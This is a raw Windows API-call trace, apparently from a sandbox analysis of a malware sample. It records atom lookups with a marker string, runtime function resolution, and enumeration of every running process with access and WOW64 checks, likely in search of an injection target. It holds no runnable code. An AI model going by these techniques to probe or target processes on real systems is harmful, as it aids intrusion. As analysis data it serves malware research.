	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetLastError () returned 0x5
	[0096.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.887] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.887] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.887] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.887] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.887] CloseHandle (hObject=0x248) returned 1
	[0096.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.888] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.888] CloseHandle (hObject=0x248) returned 1
	[0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad88, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.888] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.888] CloseHandle (hObject=0x248) returned 1
	[0096.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x166d8) returned 0xc0000004
	[0096.925] VirtualAlloc (lpAddress=0x0, dwSize=0x167d8, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x167d8, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac98, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.930] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.930] CloseHandle (hObject=0x248) returned 1
	[0096.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.931] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.931] CloseHandle (hObject=0x248) returned 1
	[0096.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658f68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.932] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.932] CloseHandle (hObject=0x248) returned 1
	[0096.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.932] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.932] CloseHandle (hObject=0x248) returned 1
	[0096.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.932] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.932] CloseHandle (hObject=0x248) returned 1
	[0096.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.933] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.933] CloseHandle (hObject=0x248) returned 1
	[0096.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590e8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.933] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.933] CloseHandle (hObject=0x248) returned 1
	[0096.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.933] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.933] CloseHandle (hObject=0x248) returned 1
	[0096.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.934] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.934] CloseHandle (hObject=0x248) returned 1
	[0096.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.934] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.934] CloseHandle (hObject=0x248) returned 1
	[0096.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.935] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.935] CloseHandle (hObject=0x248) returned 1
	[0096.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658e68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.935] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.935] CloseHandle (hObject=0x248) returned 1
	[0096.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658d48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.935] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.935] CloseHandle (hObject=0x248) returned 1
	[0096.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac98, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.936] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.936] CloseHandle (hObject=0x248) returned 1
	[0096.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.936] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.936] CloseHandle (hObject=0x248) returned 1
	[0096.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.936] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.936] CloseHandle (hObject=0x248) returned 1
	[0096.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658d28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.937] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.937] CloseHandle (hObject=0x248) returned 1
	[0096.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.937] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.937] CloseHandle (hObject=0x248) returned 1
	[0096.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.937] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.937] CloseHandle (hObject=0x248) returned 1
	[0096.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658e68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.938] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.938] CloseHandle (hObject=0x248) returned 1
	[0096.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658ee8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.938] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.938] CloseHandle (hObject=0x248) returned 1
	[0096.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.938] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.938] CloseHandle (hObject=0x248) returned 1
	[0096.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.939] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.939] CloseHandle (hObject=0x248) returned 1
	[0096.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.939] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.939] CloseHandle (hObject=0x248) returned 1
	[0096.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.939] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.939] CloseHandle (hObject=0x248) returned 1
	[0096.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
